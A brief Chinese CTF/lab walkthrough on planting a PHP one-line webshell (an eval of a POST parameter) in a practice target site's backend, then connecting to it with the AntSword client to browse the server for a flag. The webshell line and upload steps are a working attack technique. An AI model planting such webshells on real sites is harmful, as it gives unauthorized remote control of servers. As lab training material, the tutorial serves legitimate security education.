在已经登录后台的网站(靶机)上,上传含有小木马的文件,即安插卧底
-
先编写一个含有木马的文件,可以用文本文档编写,之后将后缀名改为.php
木马内容:<?php @eval($_POST['11']);?>
其中,11就相当于与卧底的接头暗号,可以任意更改,但是要记得,一会儿还有用。 -
根据上一篇文章成功进入后台后,将小木马文件上传进网站,
-
(注意:要将木马文件放入你能找得到的地方。)
-
-
之后找到木马文件并下载。
(注意:要去前端找小木马的文件)
单击下载了之后会显示一片空白,就将空白的页面的网址复制
-
打开蚁剑
-
右键添加数据,将网址粘贴上去,那个连接密码就是之前设置的密码。输入完成后就可以去找flag了
-
至于flag的文件夹,只能慢慢找,根据一般的心理,这类数据可能会放在home的文件夹下,可以考虑去查一下